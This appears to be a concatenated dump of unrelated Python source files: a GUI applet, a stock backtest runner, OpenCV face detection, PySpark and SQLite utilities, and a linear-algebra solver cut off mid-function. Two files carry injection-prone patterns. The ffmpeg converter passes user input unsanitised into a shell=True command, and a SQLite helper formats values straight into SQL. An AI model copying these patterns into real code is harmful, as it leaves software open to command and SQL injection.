self.initFeatureDlg()\n\n def getFeatureIdOrder(self):\n featureIrdOrder = []\n for group, featureIds in self.FeatureGroups:\n featureIrdOrder += featureIds\n return featureIrdOrder\n\n def initFeatureOrder(self):\n self.topLevelOperatorView.Scales.setValue( self.ScalesList )\n self.topLevelOperatorView.FeatureIds.setValue( self.getFeatureIdOrder() )\n \n def initAppletDrawerUi(self):\n \"\"\"\n Load the ui file for the applet drawer, which we own.\n \"\"\"\n localDir = os.path.split(__file__)[0]\n # (We don't pass self here because we keep the drawer ui in a separate object.)\n self.drawer = uic.loadUi(localDir+\"/featureSelectionDrawer.ui\")\n self.drawer.SelectFeaturesButton.clicked.connect(self.onFeatureButtonClicked)\n self.drawer.UsePrecomputedFeaturesButton.clicked.connect(self.onUsePrecomputedFeaturesButtonClicked)\n dbg = ilastik_config.getboolean(\"ilastik\", \"debug\") \n if not dbg:\n self.drawer.UsePrecomputedFeaturesButton.setHidden(True)\n\n def initViewerControlUi(self):\n \"\"\"\n Load the viewer controls GUI, which appears below the applet bar.\n In our case, the viewer control GUI consists mainly of a layer list.\n \n TODO: Right now we manage adding/removing entries to a plain listview \n widget by monitoring the layerstack for changes.\n Ideally, we should implement a custom widget that does this for us, \n which would be initialized with the layer list model (like volumina.layerwidget)\n \"\"\"\n self._viewerControlWidget = uic.loadUi(os.path.split(__file__)[0] + \"/viewerControls.ui\")\n \n layerListWidget = self._viewerControlWidget.featureListWidget\n layerListWidget.setSelectionMode(QAbstractItemView.SingleSelection)\n\n # Need to handle data changes because the layerstack model hasn't \n # updated his data yet by the time he calls the rowsInserted signal\n def handleLayerStackDataChanged(startIndex, stopIndex):\n row = startIndex.row()\n layerListWidget.item(row).setText(self.layerstack[row].name)\n \n def handleSelectionChanged(row):\n # Only one layer is visible at a time\n for i, layer in enumerate(self.layerstack):\n layer.visible = (i == row)\n \n def handleInsertedLayers(parent, start, end):\n for i in range(start, end+1):\n layerListWidget.insertItem(i, self.layerstack[i].name)\n if layerListWidget.model().rowCount() == 1:\n layerListWidget.item(0).setSelected(True)\n\n def handleRemovedLayers(parent, start, end):\n for i in reversed(range(start, end+1)):\n layerListWidget.takeItem(i)\n \n self.layerstack.dataChanged.connect(handleLayerStackDataChanged)\n self.layerstack.rowsRemoved.connect( handleRemovedLayers )\n self.layerstack.rowsInserted.connect( handleInsertedLayers )\n layerListWidget.currentRowChanged.connect( handleSelectionChanged )\n \n def setupLayers(self):\n opFeatureSelection = self.topLevelOperatorView\n inputSlot = opFeatureSelection.InputImage\n \n layers = []\n \n if inputSlot.ready(): \n rawLayer = self.createStandardLayerFromSlot(inputSlot)\n rawLayer.visible = True\n rawLayer.opacity = 1.0\n rawLayer.name = \"Raw Data (display only)\" \n layers.append(rawLayer)\n\n featureMultiSlot = opFeatureSelection.FeatureLayers\n if inputSlot.ready() and featureMultiSlot.ready():\n for featureIndex, featureSlot in enumerate(featureMultiSlot):\n assert featureSlot.ready()\n layers += self.getFeatureLayers(inputSlot, featureSlot)\n \n layers[0].visible = True\n return layers\n\n def getFeatureLayers(self, inputSlot, featureSlot):\n \"\"\"\n Generate a list of layers for the feature image produced by the given slot.\n \"\"\"\n layers = []\n \n channelAxis = inputSlot.meta.axistags.channelIndex\n assert channelAxis == featureSlot.meta.axistags.channelIndex\n numInputChannels = inputSlot.meta.shape[channelAxis]\n numFeatureChannels = featureSlot.meta.shape[channelAxis]\n\n # Determine how many channels this feature has (up to 3)\n featureChannelsPerInputChannel = numFeatureChannels / numInputChannels\n assert 0 < featureChannelsPerInputChannel <= 3, \"The feature selection Gui does not yet support features with more than three channels per input channel.\" \n\n for inputChannel in range(numInputChannels):\n # Determine the name for this feature\n featureName = featureSlot.meta.description\n assert featureName is not None\n if 2 <= numInputChannels <= 3:\n channelNames = ['R', 'G', 'B']\n featureName += \" (\" + channelNames[inputChannel] + \")\"\n if numInputChannels > 3:\n featureName += \" (Ch. {})\".format(inputChannel)\n\n opSubRegion = OpSubRegion(parent=self.topLevelOperatorView.parent)\n opSubRegion.Input.connect( featureSlot )\n start = [0] * len(featureSlot.meta.shape)\n start[channelAxis] = inputChannel * featureChannelsPerInputChannel\n stop = list(featureSlot.meta.shape)\n stop[channelAxis] = (inputChannel+1) * featureChannelsPerInputChannel\n opSubRegion.Start.setValue( tuple(start) )\n opSubRegion.Stop.setValue( tuple(stop) )\n \n featureLayer = self.createStandardLayerFromSlot( opSubRegion.Output )\n featureLayer.visible = False\n featureLayer.opacity = 1.0\n featureLayer.name = featureName\n \n layers.append(featureLayer)\n\n return layers\n\n def initFeatureDlg(self):\n \"\"\"\n Initialize the feature selection widget.\n \"\"\"\n self.initFeatureOrder()\n\n self.featureDlg = FeatureDlg(parent = self)\n self.featureDlg.setWindowTitle(\"Features\")\n try:\n size = PreferencesManager().get(\"featureSelection\",\"dialog size\")\n self.featureDlg.resize(*size)\n except TypeError:pass\n \n def saveSize():\n size = self.featureDlg.size()\n s = (size.width(),size.height())\n PreferencesManager().set(\"featureSelection\",\"dialog size\",s)\n self.featureDlg.accepted.connect(saveSize)\n \n # Map from groups of feature IDs to groups of feature NAMEs\n groupedNames = []\n for group, featureIds in self.FeatureGroups:\n featureEntries = []\n for featureId in featureIds:\n featureName = self.FeatureNames[featureId]\n featureEntries.append( FeatureEntry(featureName) )\n groupedNames.append( (group, featureEntries) )\n self.featureDlg.createFeatureTable( groupedNames, self.ScalesList )\n self.featureDlg.setImageToPreView(None)\n\n # Init with no features\n rows = len(self.topLevelOperatorView.FeatureIds.value)\n cols = len(self.topLevelOperatorView.Scales.value)\n defaultFeatures = numpy.zeros((rows,cols), dtype=bool)\n self.featureDlg.selectedFeatureBoolMatrix = defaultFeatures\n\n self.featureDlg.accepted.connect(self.onNewFeaturesFromFeatureDlg)\n\n # Disable the first column, except for the first item.\n # This is a slightly hacky way of fixing ilastik issue #610.\n # Besides color, the features at a sigma of 0.3 are not valid because the \n # results are overwhelmed by the inherent sampling noise of the filter.\n # (This is a bit hacky because we ASSUME the first feature is Gaussian \n # Smoothing. It works for now.)\n enabled_item_mask = numpy.ones( defaultFeatures.shape, dtype=bool )\n enabled_item_mask[1:,0] = False # hacky\n self.featureDlg.setEnableItemMask( enabled_item_mask )\n\n def onUsePrecomputedFeaturesButtonClicked(self):\n options = QFileDialog.Options()\n if ilastik_config.getboolean(\"ilastik\", \"debug\"):\n options |= QFileDialog.DontUseNativeDialog\n\n filename = QFileDialog.getOpenFileName(self, 'Open Feature List', '.', options=options)\n filename = encode_from_qstring(filename)\n \n #sanity checks on the given file\n if not filename:\n return\n if not os.path.exists(filename):\n QMessageBox.critical(self, \"Open Feature List\", \"File '%s' does not exist\" % filename)\n return\n f = open(filename, 'r')\n with f:\n for line in f:\n line = line.strip()\n if len(line) == 0:\n continue\n if not os.path.exists(line):\n QMessageBox.critical(self, \"Open Feature List\", \"File '%s', referenced in '%s', does not exist\" % (line, filename))\n return\n try:\n h = h5py.File(line, 'r')\n with h:\n assert len(h[\"data\"].shape) == 3\n except:\n QMessageBox.critical(self, \"Open Feature List\", \"File '%s', referenced in '%s', could not be opened as an HDF5 file or does not contain a 3D dataset called 'data'\" % (line, filename))\n return\n\n self.topLevelOperatorView.FeatureListFilename.setValue(filename)\n self.topLevelOperatorView._setupOutputs()\n self.onFeaturesSelectionsChanged()\n\n # Notify the workflow that some applets may have changed state now.\n # (For example, the downstream pixel classification applet can \n # be used now that there are features selected)\n self.parentApplet.appletStateUpdateRequested.emit()\n\n def onFeatureButtonClicked(self):\n self.topLevelOperatorView.FeatureListFilename.setValue(\"\")\n \n # Refresh the feature matrix in case it has changed since the last time we were opened\n # (e.g. if the user loaded a project from disk)\n if self.topLevelOperatorView.SelectionMatrix.ready() and self.topLevelOperatorView.FeatureIds.ready():\n # Re-order the feature matrix using the loaded feature ids\n matrix = self.topLevelOperatorView.SelectionMatrix.value\n featureOrdering = self.topLevelOperatorView.FeatureIds.value\n \n reorderedMatrix = numpy.zeros(matrix.shape, dtype=bool)\n newrow = 0\n for group, featureIds in self.FeatureGroups:\n for featureId in featureIds:\n oldrow = featureOrdering.index(featureId)\n reorderedMatrix[newrow] = matrix[oldrow]\n newrow += 1\n \n self.featureDlg.selectedFeatureBoolMatrix = reorderedMatrix\n \n # Now open the feature selection dialog\n self.featureDlg.exec_()\n\n def onNewFeaturesFromFeatureDlg(self):\n opFeatureSelection = self.topLevelOperatorView\n if opFeatureSelection is not None:\n # Re-initialize the scales and features\n self.initFeatureOrder()\n\n # Give the new features to the pipeline (if there are any)\n featureMatrix = numpy.asarray(self.featureDlg.selectedFeatureBoolMatrix)\n if featureMatrix.any():\n # Disable gui\n self.parentApplet.busy = True\n self.parentApplet.appletStateUpdateRequested.emit()\n QApplication.instance().setOverrideCursor( QCursor(Qt.WaitCursor) )\n QApplication.instance().processEvents()\n \n try:\n opFeatureSelection.SelectionMatrix.setValue( featureMatrix )\n except DatasetConstraintError as ex:\n # The user selected some scales that were too big.\n QMessageBox.critical(self, \"Invalid selections\", ex.message)\n opFeatureSelection.SelectionMatrix.disconnect()\n \n # Re-enable gui\n QApplication.instance().restoreOverrideCursor()\n self.parentApplet.busy = False\n self.parentApplet.appletStateUpdateRequested.emit()\n else:\n # Not valid to give a matrix with no features selected.\n # Disconnect.\n opFeatureSelection.SelectionMatrix.disconnect()\n\n # Notify the workflow that some applets may have changed state now.\n # (For example, the downstream pixel classification applet can \n # be used now that there are features selected)\n self.parentApplet.appletStateUpdateRequested.emit()\n\n def onFeaturesSelectionsChanged(self):\n \"\"\"\n Handles changes to our top-level operator's matrix of feature selections.\n \"\"\"\n # Update the drawer caption\n \n fff = ( self.topLevelOperatorView.FeatureListFilename.ready() and \\\n len(self.topLevelOperatorView.FeatureListFilename.value) != 0)\n \n if not self.topLevelOperatorView.SelectionMatrix.ready() and not fff: \n self.drawer.caption.setText( \"(No features selected)\" )\n self.layerstack.clear()\n elif fff:\n self.drawer.caption.setText( \"(features from files)\" )\n else:\n self.initFeatureOrder()\n matrix = self.topLevelOperatorView.SelectionMatrix.value\n self.drawer.caption.setText( \"(Selected %d features)\" % numpy.sum(matrix) )\n","sub_path":"ilastik/applets/featureSelection/featureSelectionGui.py","file_name":"featureSelectionGui.py","file_ext":"py","file_size_in_byte":17415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"485745643","text":"# -*- coding: utf-8 -*-\nimport multiprocessing\nimport warnings\nwarnings.simplefilter(action='ignore', category=FutureWarning)\n\nfrom bdshare import get_current_trading_code\n\nfrom backtraderbd.data.bdshare import DseHisData as bds\nimport backtraderbd.tasks as btasks\nfrom backtraderbd.libs.log import get_logger\nfrom backtraderbd.settings import settings as conf\nfrom backtraderbd.libs import models\n\nlogger = get_logger(__name__)\n\n\ndef back_test(Strategy, stock):\n \"\"\"\n Run back testing tasks via multiprocessing\n :return: None\n \"\"\"\n task = btasks.Task(Strategy, stock)\n result = task.task()\n\n stock_id = result.get('stock_id')\n trading_days = result.get('trading_days')\n total_return_rate = result.get('total_return_rate')\n max_drawdown = result.get('max_drawdown')\n max_drawdown_period = result.get('max_drawdown_period')\n logger.debug(\n f'Stock {stock_id} back testing result, trading days: {trading_days:.2f}, '\n f'total return rate: {total_return_rate:.2f}, '\n f'max drawdown: {max_drawdown:.2f}, '\n f'max drawdown period: {max_drawdown_period:.2f}'\n )\n\n drawdown_points = result.get('drawdown_points')\n logger.debug('Draw down points:')\n for drawdown_point in drawdown_points:\n drawdown_point_dt = drawdown_point.get(\"datetime\").isoformat()\n drawdown = drawdown_point.get('drawdown')\n drawdownlen = drawdown_point.get('drawdownlen')\n logger.debug(\n f'stock: {stock_id}, drawdown_point: {drawdown_point_dt}, '\n f'drawdown: {drawdown:.2f}, drawdownlen: {drawdownlen}'\n )\n\n\ndef main(Strategy, stock_pools):\n \"\"\"\n Get all stocks and run back test.\n :param stock_pools: list, the stock code list.\n :return: None\n \"\"\"\n i=1\n pool = multiprocessing.Pool()\n for stock in stock_pools['symbol']:\n bds.download_one_delta_data(stock)\n pool.apply_async(back_test, args=(Strategy, stock, ))\n print('Process No: {0} - Stock Code: {1} :: Done'.format(i, stock))\n i +=1\n pool.close()\n pool.join()\n\n\nif __name__ == '__main__':\n # create params library if not exist\n models.get_or_create_library(conf.STRATEGY_PARAMS_LIBNAME)\n\n bd_stocks = get_current_trading_code()\n main(\"smac\", bd_stocks)\n","sub_path":"tests/bt_main_initial.py","file_name":"bt_main_initial.py","file_ext":"py","file_size_in_byte":2281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"266213553","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/ipfspinsteem/strings.py\n# Compiled at: 2018-04-27 14:12:24\n# Size of source mod 2**32: 451 bytes\nHash = 'Hash'\nName = 'Name'\nuser = 'user'\npermlink = 'permlink'\ndonotadd = 'donotadd'\nvideo = 'video'\naudio = 'audio'\npepe = 'pepe'\ninfo = 'info'\nobj = 'obj'\nlinks = 'Links'\npermlinks = 'permlinks'\navailable = {'json_metadata': [\n {'video': [\n {'content': ['videohash', 'video480hash', 'video720hash', 'video240hash', 'subtitleshash', 'subtitles']},\n {'info': ['snaphash', 'spritehash']}]},\n {'audio': [{'files': ['sound', 'cover', 'peaks']}]},\n {'ipfsHash': []}, {'ipfs_photo': []}]}","sub_path":"pycfiles/ipfs_pin_steem-1.0.7-py36-none-any/strings.cpython-36.py","file_name":"strings.cpython-36.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"398953751","text":"import cv2\r\n\r\nface = cv2.CascadeClassifier('file-xml/face-detect.xml')\r\neye = cv2.CascadeClassifier('file-xml/eye-detect.xml')\r\n\r\nimg = cv2.imread('img/mutia.JPG')\r\n\r\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) #cvt = convert\r\nmuka = face.detectMultiScale(gray, 1.3, 5)\r\n\r\nfor (x, y, w, h) in muka: #sumbu x dan y, sdgkan w & h = lebar dan tinggi muka\r\n #membuat kotak pada wajah gambar img mulai dari kordinat (x, y) sampai kodrdinat (x+w, y+h) dengan warna hijau(0,255,0) tebal garis 5px\r\n cv2.rectangle(img, (x, y), (x+w, y+h), (0, 255, 0), 5)\r\n\r\n # Region of Image (ROI) untuk mata\r\n roi_warna = img[y:y+h, x:x+w]\r\n roi_gray = gray[y:y+h, x:x+w]\r\n mata = eye.detectMultiScale(roi_gray, 1.3, 3)\r\n\r\n for (mx, my, mw, mh) in mata:\r\n cv2.rectangle(roi_warna, (mx, my), (mx + mw, my + mh), (255, 255, 0), 1)\r\n\r\ncv2.imshow('face and eye detection', img)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()","sub_path":"image_processing_with_opencv/img_detection&operation/3_face&eye_detect_img.py","file_name":"3_face&eye_detect_img.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"411996091","text":"from __future__ import print_function\n\nimport sys\nfrom operator import add\nfrom pyspark import SparkContext\nfrom csv import reader\n\nif __name__ == \"__main__\":\n\tsc = SparkContext()\n\tdata = sc.textFile(sys.argv[1], 1)\n\theader = data.first() \n\tlines = data.filter(lambda row: row != header) \n\tline = lines.map(lambda x:(x.encode('ascii','ignore')))\\\n\t\t\t\t.mapPartitions(lambda x: (reader(x, delimiter = ',', quotechar = '\"')))\n\n\tdef check_missing_values(content):\n\t\ttry:\n\t\t\tcontents = content.lower()\n\t\texcept AttributeError:\n\t\t\tcontents = content\n\t\t\n\t\tresult = \"NOT NULL\"\n\n\t\tif contents == '':\n\t\t\tresult = \"BLANK\"\n\t\t\n\t\telif (contents == 'n/a' or contents == 'N/A'):\n\t\t\tresult = \"N/A\"\n\t\t\n\t\telif (contents == 'na' or contents == 'NA'):\n\t\t\tresult = \"NA\"\n\t\t\n\t\telif (contents == 'unspecified' or contents == 'Unspecified'):\n\t\t\tresult = \"Unspecified\"\n\n\t\treturn result\n\n\tlocation = line.map(lambda x: (x[52].encode('utf-8')))\\\n\t\t\t\t\t.map(lambda x: (check_missing_values(x), 1))\\\n\t\t\t\t\t.reduceByKey(add)\\\n\t\t\t\t\t.map(lambda x: x[0]+'\\t'+str(x[1]))\\\n\t\t\t\t\t.saveAsTextFile(\"mv_52.out\")\n\n","sub_path":"src/data_issue/test_col.py","file_name":"test_col.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"429656714","text":"import glob, os\r\nimport subprocess\r\n\r\ndirPath = input(\"Enter Dir path where target Video File is located: \")\r\nos.chdir(dirPath)\r\n\r\nfileName = input(\"Enter FileName: \")\r\nbitRate = input(\"Enter video bitRate [0: for default, 1M, 1500K etc] : \")\r\nultraFast = input(\"Enable Ultrafast? [y/n] : \")\r\noutFileName = fileName + \"_conv.mp4\"\r\nfileName = fileName + \".mp4\"\r\n\r\nif ultraFast is 'y' or 'Y':\r\n ultraFastStr = \" -preset ultrafast \"\r\nelse:\r\n ultraFastStr = \" \"\r\n\r\nif bitRate is not '0':\r\n ffmpegCmd = \"ffmpeg -i \" + fileName + \" -c:v libx265 -b:v \" + bitRate + \" -c:a copy\" + ultraFastStr + outFileName\r\nelse:\r\n ffmpegCmd = \"ffmpeg -i \" + fileName + \" -c:v libx265 -c:a copy\" + ultraFastStr + outFileName\r\n\r\nretValue = subprocess.call(ffmpegCmd, shell=True)\r\nprint(retValue)\r\n","sub_path":"vidConvertToHEVC.py","file_name":"vidConvertToHEVC.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"492986468","text":"import re\nimport sqlite3\nimport csv\nimport numpy as np\nimport os\nimport yaml\nimport logging\nimport sys\nimport logging.config\n\n\nlogger = logging.getLogger(__name__)\n\nPROJECT_DIR = '~/icecube/meta-projects/offline-software/trunk/hist-assignment'\n\ndef init_multiprocess_logging():\n \"\"\"The normal python logging module is not multiprocess safe so a custom implementation is\n used instead.\"\"\"\n if os.path.exists('config/logging_config.yaml'):\n with open('config/logging_config.yaml', 'rt') as f:\n config = yaml.load(f.read())\n logging.config.dictConfig(config)\n\n\ndef get_program_dir():\n return PROJECT_DIR\n\n\ndef gen_info_from_old_fn(filename):\n match = re.search(r\"([^\\.\\/]+?)(?:-histo)?\\.([^\\.\\/]+)\\.([^\\.\\/]+)(?=.pickle)\", filename)\n dataset_id = match.group(2)\n category = match.group(1)\n queue_id = match.group(3)\n return dataset_id, category, queue_id\n\n\ndef get_info_from_fn(filename):\n \"\"\"\n Returns the information from a given fn.\n :param filename:\n :return: (dataset_id, category, queue_id, subcategory)\n \"\"\"\n match = re.search(r\"(?:^|\\/)([^\\.\\/]+)\\.([^\\.\\/]+)\\.([^\\.\\/]+)\\.([^\\.\\/]+)(?=-histo.pickle)\", filename)\n dataset_id = match.group(1)\n category = match.group(2)\n queue_id = match.group(3)\n subcategory = match.group(4)\n return dataset_id, category, queue_id, subcategory\n\n\ndef generate_filename(dataset_id, category, queue_id, subcategory):\n filename_template = \"{dataset_id}.{category}.{queue_id}.{subcategory}-histo.pickle\"\n return filename_template.format(dataset_id=dataset_id, category=category, queue_id=queue_id, subcategory=subcategory)\n\n\ndef progress(count, total, suffix=''):\n \"\"\"\n Draws a progress bar to the standard output.\n\n :param count: number\n :param total: number\n :param suffix: Displayed at end of progress bar\n :return: None\n \"\"\"\n bar_len = 60\n filled_len = int(round(bar_len * count / float(total)))\n\n percents = round(100.0 * count / float(total), 1)\n bar = '=' * filled_len + '-' * (bar_len - filled_len)\n\n sys.stdout.write('[%s] %s%s ...%s\\r' % (bar, percents, '%', suffix))\n if count == total:\n sys.stdout.write('\\n')\n sys.stdout.flush()\n\n# HISTOGRAM RETRIEVAL AND PROCESSING METHODS\nclass ServerVariables:\n \"\"\"\n Used to store data about the datasets that the server has processed.\n \"\"\"\n def __init__(self):\n # self.datasets is a dict of (dataset_id, SimulationDataset)\n self.datasets = {}\n\n\nclass SimulationDataset:\n \"\"\"Class used to keep track of the attributes of one simulation dataset.\"\"\"\n def __init__(self, dataset_id):\n self.dataset_id = dataset_id\n self.jobs_updated = True\n self.files_corrupt = 0\n self.categories = set()\n self.histogram_names_dict = {}\n self.subcategory_dict = {}\n self.num_flagged_jobs = 0\n\n\nclass ReasonTriggered:\n def __init__(self, name, filter_name, comment, value, cutoff_value):\n \"\"\"\n :param name: name of the histogram which triggered the filter\n :param filter_name: name of the filter that was triggered\n :param comment: more information about the reason triggered\n :param value: value of the parameter which triggered the filter\n :param cutoff_value: minimum value which would trigger the filter\n \"\"\"\n self.histogram_name = name\n self.filter_name = filter_name\n self.comment = comment\n self.value = value\n self.cutoff_value = cutoff_value\n\n\nclass SuspiciousJob:\n def __init__(self, dataset_id, category, queue_id, subcategory, reasons):\n \"\"\"\n :param dataset_id:\n :param category:\n :param queue_id:\n :param subcategory:\n :param reasons: a list of ReasonTriggered objects\n \"\"\"\n self.dataset_id = dataset_id\n self.category = category\n self.queue_id = queue_id\n self.subcategory = subcategory\n self.reasons = reasons\n\n\nclass HistogramDistribution:\n \"\"\"Contains information about the contents of one column of the analysis_db. All of the self.qXXXX class variables\n represent the value at the corresponding percentile in the distribution. IE, percentile_50 represents the\n median element. \"\"\"\n def __init__(self, sd, mean, p50, p95, p99, p999, p100):\n self.sd = sd\n self.mean = mean\n self.percentile_50 = p50\n self.percentile_95 = p95\n self.percentile_99 = p99\n self.percentile_999 = p999\n self.percentile_100 = p100\n\n @staticmethod\n def create_from_np_array(arr):\n sd = arr.std()\n mean = arr.mean()\n pc = np.percentile(arr, [50.00, 95.0, 99.0, 99.9, 100.0])\n return HistogramDistribution(sd, mean, pc[0], pc[1], pc[2], pc[3], pc[4])\n\n\nclass SQLiteUtil:\n @staticmethod\n def strip_bad_sql_chars(header_list):\n for i in range(len(header_list)):\n del_nonword = r\"([^\\w\\ -])\"\n header_list[i] = re.sub(del_nonword, \"\", header_list[i]).replace('-', '_')\n # header_list[i] = ''.join(char for char in header_list[i] if char.isalnum() or char in ['-', '_', ' '])\n # header_list[i] = header_list[i].replace('-', '_')\n return header_list\n\n @staticmethod\n def add_row_to_db(conn, row_dict):\n \"\"\"\n Adds a row to the database where the dictionary's keys are the column names. Does not commit.\n :param row_dict: keys are column names, values are values\n :param conn: sqlite3 database connection\n :return:\n \"\"\"\n keys = ','.join(SQLiteUtil.strip_bad_sql_chars(row_dict.keys()))\n question_marks = ','.join(list('?' * len(row_dict)))\n values = tuple(row_dict.values())\n conn.execute('INSERT INTO jobs' + '(' + keys + ') VALUES (' + question_marks + ')', values)\n\n @staticmethod\n def get_column_names(conn, table_name):\n \"\"\"\n :param conn: connection to a sqlite3 db\n :param table_name: string\n :return: column names from the database\n \"\"\"\n cursor = conn.execute(\"SELECT * FROM {} LIMIT 0\".format(table_name))\n return list(map(lambda x: x[0], cursor.description))\n\n @staticmethod\n def get_column_values(conn, col_name, table_name):\n command = \"SELECT {} FROM {}\".format(col_name, table_name)\n old_factory = conn.row_factory\n conn.row_factory = lambda cursor, row: row[0]\n vals = conn.execute(command).fetchall()\n conn.row_factory = old_factory\n return vals\n\n @staticmethod\n def create_db_table(header_list, conn):\n # Strip column names to avoid SQL injection\n header_list = SQLiteUtil.strip_bad_sql_chars(header_list)\n c = conn.cursor()\n command = \"CREATE TABLE jobs {}\".format(str(tuple(header_list)))\n command = command.replace(\"'\", \"\")\n c.execute(command)\n conn.commit()\n\n @staticmethod\n def sqlite_to_csv(db_path, out_path, table_name):\n conn = sqlite3.connect(db_path)\n cursor = conn.cursor()\n cursor.execute(\"SELECT * FROM {};\".format(table_name))\n with open(out_path, 'wb') as csv_file:\n csv_writer = csv.writer(csv_file)\n csv_writer.writerow([i[0] for i in cursor.description]) # write headers\n csv_writer.writerows(cursor)\n conn.close()\n\n @staticmethod\n def select_row(conn, queue_id, subcategory, table_name):\n \"\"\"sqlite3.row_factory must be set to sqlite3.Row\"\"\"\n command = \"SELECT * FROM {} WHERE queue_id={} AND subcategory = '{}'\".format(table_name, queue_id, subcategory)\n c = conn.cursor()\n c.execute(command)\n return c.fetchone()\n","sub_path":"source/histogramutil.py","file_name":"histogramutil.py","file_ext":"py","file_size_in_byte":7703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"563050944","text":"#!/usr/bin/python3\n\"\"\"\nModule contains a script that prints the State object with\nthe name passed as argument from the database hbtn_0e_6_usa.\n\"\"\"\n\n\nimport sys\nfrom model_state import Base, State\nfrom sqlalchemy import (create_engine)\nfrom sqlalchemy.orm import sessionmaker\n\n\ndef print_state_id():\n \"\"\"\n Prints the State object with the name passed as\n argument from the database hbtn_0e_6_usa.\n \"\"\"\n\n arg = sys.argv\n url_base = 'mysql+mysqldb://{}:{}@localhost:3306/{}'\n db_url = url_base.format(arg[1], arg[2], arg[3])\n engine = create_engine(db_url, pool_pre_ping=True)\n Base.metadata.create_all(engine)\n Session = sessionmaker(bind=engine)\n session = Session()\n result = session.query(State).filter(State.name == arg[4]).first()\n if result is not None:\n print(result.id)\n else:\n print(\"Not found\")\n\n\nif __name__ == \"__main__\":\n print_state_id()\n","sub_path":"0x0F-python-object_relational_mapping/10-model_state_my_get.py","file_name":"10-model_state_my_get.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"494364698","text":"import math \nimport numpy as np\nimport random\nfrom copy import deepcopy\nimport time\n\ndef cs(w_ik, w_jk):\n \"\"\"Calculates c and s used in Givens rotation.\n\n Parameters\n ----------\n w_ik : float\n w_jk : float\n\n Returns\n ----------\n c : float\n s : float\n \"\"\"\n # otimizado\n if abs(w_jk) < np.finfo(np.double).eps:\n return 1.0,0.0\n r = np.hypot(w_ik,w_jk)\n return w_ik/r, -w_jk/r\n # if abs(w_ik) > abs(w_jk):\n # tau = -w_jk/w_ik\n # return 1/math.sqrt(1+tau*tau), tau/math.sqrt(1+tau*tau)\n # else:\n # tau = -w_ik/w_jk\n # return tau/math.sqrt(1+tau*tau), 1/math.sqrt(1+tau*tau)\n\ndef Rotgivens(W, n, m, i, j, k, c, s):\n \"\"\"Givens rotation.\n\n Parameters\n ----------\n W : float[][] \n n : int \n m : int \n i : int\n j : int\n c : float\n s : float\n\n Returns\n ----------\n W : float[][]\n \"\"\"\n assert type(n) is int, \"n should be integer, received %s\" %(type(n))\n assert type(m) is int, \"m should be integer, received %s\" %(type(m))\n assert type(i) is int, \"i should be integer, received %s\" %(type(i))\n\n for r in range(k,m):\n aux = c * W[i][r] - s * W[j][r]\n W[j][r] = s * W[i][r] + c * W[j][r]\n W[i][r] = aux\n return W\n\ndef solveLinear(W, n, m, b):\n \"\"\"Solves a linear equations system W(n,m) * x = b.\n\n Parameters\n ----------\n W : float[][] \n n : int \n m : int \n b : float[]\n\n Returns\n ----------\n x : float[]\n \"\"\"\n for k in range(m):\n for j in range(n-1, k, -1):\n i=j-1\n if W[j][k] != 0:\n c, s = cs(W[i][k], W[j][k])\n Rotgivens(W, n, m, i, j, k, c, s)\n Rotgivens(b, n, 1, i, j, 0, c, s)\n x = np.zeros(m)\n for k in range(m-1, -1, -1):\n sum = 0\n for j in range(k+1, m):\n sum += W[k][j]*x[j]\n x[k] = (b[k] - sum)/W[k][k]\n\n return x\n\ndef maxError(sol_ref, sol):\n \"\"\"Calculates maximum error between sol_ref and sol arrays.\n\n Parameters\n ----------\n sol_ref : float[]\n sol : float[]\n\n Returns\n ----------\n err_max : float\n \"\"\"\n assert len(sol_ref) == len(sol), \"solutions must have same size, got %d and %d\" %(len(sol_ref), len(sol))\n err_max = abs(sol_ref[0] - sol[0])\n for i in range(1, len(sol)):\n err = abs(sol_ref[i] - sol[i])\n if err > err_max:\n err_max = err\n return err_max\n\ndef solveMultipleLinear(W, n, m, p, A):\n \"\"\"Solves multiple linear equations system W(n,p) * h(p,m) = A(n,m).\n\n Parameters\n ----------\n W : float[][]\n n : int\n m : int\n p : int\n A : float[][]\n\n Returns\n ----------\n h : float[][]\n \"\"\"\n for k in range(p):\n for j in range(n-1, k, -1):\n i=j-1\n if W[j][k] != 0:\n c, s = cs(W[i][k], W[j][k])\n Rotgivens(W, n, p, i, j, k, c, s)\n Rotgivens(A, n, m, i, j, 0, c, s)\n\n h = np.zeros((p, m))\n for k in range(p-1, -1, -1):\n for j in range(m):\n sum = 0\n for i in range(k+1, p):\n sum += W[k][i]*h[i][j]\n h[k][j] = (A[k][j] - sum)/W[k][k]\n return h\n\ndef squaredError(A, W, H):\n \"\"\"Calculates squared error ||A − W * H||**2.\n\n Parameters\n ----------\n A : float[][]\n W : float[][]\n H : float[][]\n\n Returns\n ----------\n err : float\n \"\"\"\n return (np.square(A - np.matmul(W, H))).mean(axis=None)\n # err = 0\n # for i in range(n):\n # for j in range(m):\n # err += (A[i][j] - np.matmul(W, H)[i][j])**2\n # return err\n\ndef columnNorms(W):\n \"\"\"Calculates norms of W columns.\n\n Parameters\n ----------\n W : float[][]\n\n Returns\n ----------\n column_norms : float[]\n \"\"\"\n return np.sqrt((W * W).sum(axis=0))\n\ndef normalizeMatrix(W, n, p):\n \"\"\"Normalizes all columns of matrix W(n,p).\n\n Parameters\n ----------\n W : float[][]\n n : int\n p : int\n \"\"\"\n column_norms = 